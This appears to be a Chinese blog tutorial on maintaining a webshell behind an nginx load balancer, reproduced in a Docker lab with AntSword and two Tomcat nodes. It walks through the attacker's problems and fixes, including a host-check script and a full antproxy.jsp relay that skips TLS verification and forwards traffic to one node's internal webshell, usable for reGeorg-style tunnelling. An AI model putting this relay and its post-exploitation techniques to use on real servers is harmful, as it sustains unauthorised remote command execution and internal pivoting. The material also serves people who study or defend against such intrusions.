快捷導(dǎo)航

nginx負載均衡下的webshell上傳的實現(xiàn)

更新時間：2023年03月03日 10:45:37 作者：努力學(xué)IT的小徐

本文主要介紹了nginx負載均衡下的webshell上傳的實現(xiàn)，文中通過示例代碼介紹的非常詳細，對大家的學(xué)習(xí)或者工作具有一定的參考學(xué)習(xí)價值，需要的朋友們下面隨著小編來一起學(xué)習(xí)學(xué)習(xí)吧

場景描述

假定在真實生產(chǎn)環(huán)境中，存在一個RCE漏洞，可以讓我們獲取WebShell

環(huán)境的安裝

首先在GetHub上拉去漏洞的鏡像前，需提前在centos上安裝nginx和tomcat以及配置好nginx以及tomcat的相關(guān)配置文件，在使用docker將鏡像拉取下來，進行漏洞的復(fù)現(xiàn)。

1、先將docker環(huán)境搭建起來

2、測試tomcat是否可以訪問

根據(jù)上圖可以看出，后端的tomcat是可以訪問的

3、查看docker中nginx反向代理的負載均衡

4、查看docker中l(wèi)bsnode1中的ant.jsp文件

此文件可以理解為一句話木馬，在lbsnode2中也是存有相同的文件

lbsnode1:

lbsnode2:

5、通過中國蟻劍來連接ant.jsp文件

因為兩臺節(jié)點都在相同的位置存在 ant.jsp，所以連接的時候也沒出現(xiàn)什么異常

復(fù)現(xiàn)過程

存在的問題

問題一：由于nginx采用的反向代理是輪詢的方式，所以上傳文件必須在兩臺后端服務(wù)器的相同位置上傳相同的文件

因為我們是反向代理的負載均衡，就存在上傳文件出現(xiàn)一臺后端服務(wù)器上有我們上傳的文件，另一臺服務(wù)器上沒有我們上傳的文件，出現(xiàn)的結(jié)果就是，一旦一臺服務(wù)器上沒有，那么在請求輪到這臺服務(wù)器的時候，就會報出404的錯誤，從而影響使用，這也就是一會出現(xiàn)正常，一會出現(xiàn)錯誤的原因。

解決方案：

我們需要在每一臺節(jié)點的相同位置都上傳相同內(nèi)容的WebShell，從而實現(xiàn)無論是輪詢到哪臺服務(wù)器上都可以訪問到我們的后端服務(wù)器上。實現(xiàn)每一臺后端服務(wù)器上都有上傳的文件，就需要瘋狂上傳。

問題二：我們在執(zhí)行命令時，無法知道下次的請求交給哪臺機器去執(zhí)行

我們在執(zhí)行hostname -i查看當(dāng)前執(zhí)行機器的IP時，可以看到IP地址一直在漂移

問題三：當(dāng)我們需要上傳一些較大的工具時，會造成工具無法使用的情況

當(dāng)我們上傳一個較大的文件時，由于AntSword上傳文件時，采用的是分片上傳方式，把一個文件分成了多次HTTP請求發(fā)送給目標，造成文件的一部分內(nèi)容在A這臺服務(wù)器上，另一部分文件在B這臺服務(wù)器上，從而使得較大的工具或者文件無法打開或者使用

問題四：由于目標主機不能出外網(wǎng)，想要進一步深入，只能使用reGeorg/HTTPAbs 等 HTTP Tunnel，可在這個場景下，這些 tunnel 腳本全部都失靈了。

解決方案

方案一：關(guān)掉其中的一臺后端服務(wù)器

關(guān)閉后端其中的一臺服務(wù)器確實能夠解決上述的四種問題，但是這個方案實在是“老壽星上吊---活膩了”，影響業(yè)務(wù)，還會造成災(zāi)難，直接Pass不考慮

綜合評價：真是環(huán)境下千萬不要嘗試?。?！

方案二：在程序執(zhí)行前先判斷要不要執(zhí)行

既然無法預(yù)測下一次是哪臺機器去執(zhí)行，那我們的shell在執(zhí)行Payload之前，先判斷一下要不要執(zhí)行不就可以了。

首次按創(chuàng)建一個腳本demo.sh，該腳本是獲取我們的后端其中一臺服務(wù)器的地址，匹配到這臺服務(wù)器的地址才進行程序的執(zhí)行，匹配到另一臺服務(wù)器則不進行程序的執(zhí)行。

通過中國蟻劍將demo.sh腳本文件上傳到后端的兩臺服務(wù)器上，因為是負載均衡，所以需要瘋狂點擊上傳

這樣一來，確實能夠保證執(zhí)行的命令是在我們想要的機器上了，可是這樣執(zhí)行命令，沒有一絲美感，另外，大文件上傳、HTTP隧道這些問題也沒有解決。

綜合評價:該方案勉強能用，僅適合在執(zhí)行命令的時候用，不夠優(yōu)雅。

方案三：在Web層做一次HTTP流量的轉(zhuǎn)發(fā)(重點)

沒錯，我們用 AntSword 沒法直接訪問 LBSNode1 內(nèi)網(wǎng)IP(172.23.0.2)的 8080 端口，但是有人能訪問呀，除了 nginx 能訪問之外，LBSNode2 這臺機器也是可以訪問 Node1 這臺機器的 8080 端口的。

還記不記得「PHP Bypass Disable Function」這個插件，我們在這個插件加載 so 之后，本地啟動了一個 httpserver，然后我們用到了 HTTP 層面的流量轉(zhuǎn)發(fā)腳本「antproxy.php」, 我們放在這個場景下看：

我們一步一步來看這個圖，我們的目的是：所有的數(shù)據(jù)包都能發(fā)給「LBSNode 1」這臺機器

首先是第 1 步，我們請求 /antproxy.jsp，這個請求發(fā)給 nginx

nginx 接到數(shù)據(jù)包之后，會有兩種情況：

我們先看黑色線，第 2 步把請求傳遞給了目標機器，請求了 Node1 機器上的 /antproxy.jsp，接著第 3 步，/antproxy.jsp 把請求重組之后，傳給了 Node1 機器上的 /ant.jsp，成功執(zhí)行。

再來看紅色線，第 2 步把請求傳給了 Node2 機器, 接著第 3 步，Node2 機器上面的 /antproxy.jsp 把請求重組之后，傳給了 Node1 的 /ant.jsp，成功執(zhí)行。

1、創(chuàng)建 antproxy.jsp 腳本

<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<%@ page import="javax.net.ssl.*" %>
<%@ page import="java.io.ByteArrayOutputStream" %>
<%@ page import="java.io.DataInputStream" %>
<%@ page import="java.io.InputStream" %>
<%@ page import="java.io.OutputStream" %>
<%@ page import="java.net.HttpURLConnection" %>
<%@ page import="java.net.URL" %>
<%@ page import="java.security.KeyManagementException" %>
<%@ page import="java.security.NoSuchAlgorithmException" %>
<%@ page import="java.security.cert.CertificateException" %>
<%@ page import="java.security.cert.X509Certificate" %>
<%!
  public static void ignoreSsl() throws Exception {
        HostnameVerifier hv = new HostnameVerifier() {
            public boolean verify(String urlHostName, SSLSession session) {
                return true;
            }
        };
        trustAllHttpsCertificates();
        HttpsURLConnection.setDefaultHostnameVerifier(hv);
    }
    private static void trustAllHttpsCertificates() throws Exception {
        TrustManager[] trustAllCerts = new TrustManager[] { new X509TrustManager() {
            public X509Certificate[] getAcceptedIssuers() {
                return null;
            }
            @Override
            public void checkClientTrusted(X509Certificate[] arg0, String arg1) throws CertificateException {
                // Not implemented
            }
            @Override
            public void checkServerTrusted(X509Certificate[] arg0, String arg1) throws CertificateException {
                // Not implemented
            }
        } };
        try {
            SSLContext sc = SSLContext.getInstance("TLS");
            sc.init(null, trustAllCerts, new java.security.SecureRandom());
            HttpsURLConnection.setDefaultSSLSocketFactory(sc.getSocketFactory());
        } catch (KeyManagementException e) {
            e.printStackTrace();
        } catch (NoSuchAlgorithmException e) {
            e.printStackTrace();
        }
    }
%>
<%
        String target = "http://172.24.0.2:8080/ant.jsp";
        URL url = new URL(target);
        if ("https".equalsIgnoreCase(url.getProtocol())) {
            ignoreSsl();
        }
        HttpURLConnection conn = (HttpURLConnection)url.openConnection();
        StringBuilder sb = new StringBuilder();
        conn.setRequestMethod(request.getMethod());
        conn.setConnectTimeout(30000);
        conn.setDoOutput(true);
        conn.setDoInput(true);
        conn.setInstanceFollowRedirects(false);
        conn.connect();
        ByteArrayOutputStream baos=new ByteArrayOutputStream();
        OutputStream out2 = conn.getOutputStream();
        DataInputStream in=new DataInputStream(request.getInputStream());
        byte[] buf = new byte[1024];
        int len = 0;
        while ((len = in.read(buf)) != -1) {
            baos.write(buf, 0, len);
        }
        baos.flush();
        baos.writeTo(out2);
        baos.close();
        InputStream inputStream = conn.getInputStream();
        OutputStream out3=response.getOutputStream();
        int len2 = 0;
        while ((len2 = inputStream.read(buf)) != -1) {
            out3.write(buf, 0, len2);
        }
        out3.flush();
        out3.close();
%>

2、修改轉(zhuǎn)發(fā)地址，轉(zhuǎn)向目標 Node 的內(nèi)網(wǎng)IP的目標腳本訪問地址。

注意：不僅僅是 WebShell 喲，還可以改成 reGeorg 等腳本的訪問地址

我們將 target 指向了 LBSNode1 的 ant.jsp